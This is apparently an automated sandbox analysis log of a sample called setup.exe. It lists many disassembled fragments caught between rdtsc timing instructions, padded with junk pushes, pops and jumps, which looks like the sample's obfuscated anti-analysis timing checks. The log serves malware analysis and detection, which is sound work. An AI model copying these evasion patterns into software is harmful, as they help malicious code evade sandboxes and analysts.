Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE0AB5 second address: 4CE0B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDDE9067F6Fh 0x00000013 adc ax, 133Eh 0x00000018 jmp 00007FDDE9067F79h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FDDE9067F70h 0x00000024 and eax, 43A83038h 0x0000002a jmp 00007FDDE9067F6Bh 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FDDE9067F75h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE0B2E second address: 4CE0B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE0B34 second address: 4CE0B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE0B38 second address: 4CE0B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDDE8CE13E2h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE0B55 second address: 4CE0B5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 5CCE48A4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80107 second address: 4C8010F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, cx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C8010F second address: 4C80115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80115 second address: 4C8015A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c call 00007FDDE8CE13DDh 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push ebx 0x00000016 call 00007FDDE8CE13DAh 0x0000001b pop eax 0x0000001c pop ebx 0x0000001d popad 0x0000001e push dword ptr [ebp+04h] 0x00000021 jmp 00007FDDE8CE13DEh 0x00000026 push dword ptr [ebp+0Ch] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C8015A second address: 4C8015E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C8015E second address: 4C80162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80162 second address: 4C80168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C801E8 second address: 4C801EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA066B second address: 4CA066F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA066F second address: 4CA0673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA0673 second address: 4CA0679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA0679 second address: 4CA067F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA067F second address: 4CA0683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA0683 second address: 4CA06B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007FDDE8CE13E6h 0x0000000f mov eax, 1D6CD061h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDDE8CE13DAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA06B6 second address: 4CA06BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA06BC second address: 4CA06F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a movsx edi, cx 0x0000000d mov ch, 16h 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 jmp 00007FDDE8CE13E3h 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDDE8CE13E5h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA06F9 second address: 4CA06FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA0417 second address: 4CA042A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov edx, 70A1C3DCh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA042A second address: 4CA048E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FDDE9067F70h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FDDE9067F6Dh 0x0000001c xor eax, 75600996h 0x00000022 jmp 00007FDDE9067F71h 0x00000027 popfd 0x00000028 call 00007FDDE9067F70h 0x0000002d pop eax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA048E second address: 4CA04A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDE8CE13E7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CB01E2 second address: 4CB01E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CB01E7 second address: 4CB01ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CB01ED second address: 4CB01F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE09C0 second address: 4CE09C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE09C4 second address: 4CE09CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE09CA second address: 4CE09FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 2DF41D13h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FDDE8CE13DEh 0x00000016 sub cx, 9798h 0x0000001b jmp 00007FDDE8CE13DBh 0x00000020 popfd 0x00000021 push ecx 0x00000022 pop ebx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE09FD second address: 4CE0A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE0A03 second address: 4CE0A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE0A07 second address: 4CE0A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007FDDE9067F6Fh 0x00000012 sbb eax, 744D550Eh 0x00000018 jmp 00007FDDE9067F79h 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CC01CB second address: 4CC0201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e jmp 00007FDDE8CE13DCh 0x00000013 and dword ptr [eax], 00000000h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDDE8CE13E7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA05AF second address: 4CA05BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA05BE second address: 4CA05D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDE8CE13E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA05D6 second address: 4CA05F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ax, 32FBh 0x00000011 push eax 0x00000012 push edx 0x00000013 mov ebx, eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CA05F1 second address: 4CA0646 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007FDDE8CE13E4h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FDDE8CE13E0h 0x00000014 mov ebp, esp 0x00000016 jmp 00007FDDE8CE13E0h 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007FDDE8CE13DDh 0x00000024 mov di, cx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CB0DB4 second address: 4CB0DC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 mov eax, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CB0DC6 second address: 4CB0DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 1CE30841h 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDDE8CE13E3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CC0010 second address: 4CC001F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CC001F second address: 4CC0037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDE8CE13E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CC0037 second address: 4CC0048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a mov ax, 9149h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CC0048 second address: 4CC007A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], ebp 0x00000009 jmp 00007FDDE8CE13DEh 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDDE8CE13E7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CC007A second address: 4CC0080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CC0080 second address: 4CC0084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE003C second address: 4CE00A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d mov edx, ecx 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FDDE9067F78h 0x00000019 or si, 29F8h 0x0000001e jmp 00007FDDE9067F6Bh 0x00000023 popfd 0x00000024 mov eax, 1949332Fh 0x00000029 popad 0x0000002a xchg eax, ecx 0x0000002b jmp 00007FDDE9067F72h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov ebx, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE00A0 second address: 4CE00A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE00A5 second address: 4CE00BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 3388h 0x00000007 mov eax, edi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ecx 0x0000000d pushad 0x0000000e mov esi, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 mov edi, 623F4FF6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE00BC second address: 4CE0134 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [76FA65FCh] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDDE8CE13DFh 0x00000013 or al, 0000007Eh 0x00000016 jmp 00007FDDE8CE13E9h 0x0000001b popfd 0x0000001c movzx eax, di 0x0000001f popad 0x00000020 test eax, eax 0x00000022 jmp 00007FDDE8CE13E3h 0x00000027 je 00007FDE5AF24C2Dh 0x0000002d pushad 0x0000002e call 00007FDDE8CE13E4h 0x00000033 mov bh, ah 0x00000035 pop edi 0x00000036 push eax 0x00000037 push edx 0x00000038 mov esi, 5AC64969h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE0134 second address: 4CE0172 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, eax 0x00000009 pushad 0x0000000a mov edi, 16824520h 0x0000000f popad 0x00000010 xor eax, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 mov edx, esi 0x00000016 mov cl, 9Ch 0x00000018 popad 0x00000019 and ecx, 1Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f call 00007FDDE9067F72h 0x00000024 pop eax 0x00000025 jmp 00007FDDE9067F6Bh 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE0172 second address: 4CE01DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b jmp 00007FDDE8CE13DEh 0x00000010 leave 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FDDE8CE13DDh 0x0000001a adc ecx, 683E1996h 0x00000020 jmp 00007FDDE8CE13E1h 0x00000025 popfd 0x00000026 call 00007FDDE8CE13E0h 0x0000002b pop esi 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE02C2 second address: 4CE02C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4CE02C8 second address: 4CE0310 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 call 00007FDDE8CE13E5h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FDDE8CE13DEh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDDE8CE13E7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90019 second address: 4C9001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C9001D second address: 4C90021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90021 second address: 4C90027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90027 second address: 4C9002D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C9002D second address: 4C90031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90031 second address: 4C90035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90035 second address: 4C90070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FDDE9067F6Dh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FDDE9067F6Eh 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007FDDE9067F6Dh 0x0000001e movzx ecx, bx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90070 second address: 4C90075 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90075 second address: 4C900F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDDE9067F76h 0x0000000a or si, 3B48h 0x0000000f jmp 00007FDDE9067F6Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 and esp, FFFFFFF8h 0x0000001b pushad 0x0000001c mov cl, 5Bh 0x0000001e mov edx, 041C1224h 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FDDE9067F75h 0x0000002e and cx, 7F16h 0x00000033 jmp 00007FDDE9067F71h 0x00000038 popfd 0x00000039 call 00007FDDE9067F70h 0x0000003e pop esi 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C900F3 second address: 4C90128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c pushad 0x0000000d mov ebx, ecx 0x0000000f mov ch, 34h 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FDDE8CE13E3h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90128 second address: 4C90140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDE9067F74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90140 second address: 4C90168 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDDE8CE13E9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90168 second address: 4C9016E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C9016E second address: 4C90173 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90173 second address: 4C901D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c jmp 00007FDDE9067F72h 0x00000011 xchg eax, esi 0x00000012 jmp 00007FDDE9067F70h 0x00000017 push eax 0x00000018 pushad 0x00000019 mov ax, 1673h 0x0000001d popad 0x0000001e xchg eax, esi 0x0000001f jmp 00007FDDE9067F76h 0x00000024 mov esi, dword ptr [ebp+08h] 0x00000027 jmp 00007FDDE9067F70h 0x0000002c xchg eax, edi 0x0000002d pushad 0x0000002e push ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C901D8 second address: 4C9023F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FDDE8CE13E4h 0x0000000c xchg eax, edi 0x0000000d jmp 00007FDDE8CE13E0h 0x00000012 test esi, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FDDE8CE13DDh 0x0000001d add si, 3E26h 0x00000022 jmp 00007FDDE8CE13E1h 0x00000027 popfd 0x00000028 jmp 00007FDDE8CE13E0h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C9023F second address: 4C90245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90245 second address: 4C90249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90249 second address: 4C9027C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FDE5B2F632Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FDDE9067F6Eh 0x00000017 and esi, 2A45BA28h 0x0000001d jmp 00007FDDE9067F6Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C90386 second address: 4C9038C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C9038C second address: 4C90390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80943 second address: 4C80978 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDDE8CE13E3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C80978 second address: 4C8097E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C8097E second address: 4C809AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDDE8CE13E1h 0x00000009 jmp 00007FDDE8CE13DBh 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ax, bx 0x00000019 movsx edi, cx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4C809AD second address: 4C809B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
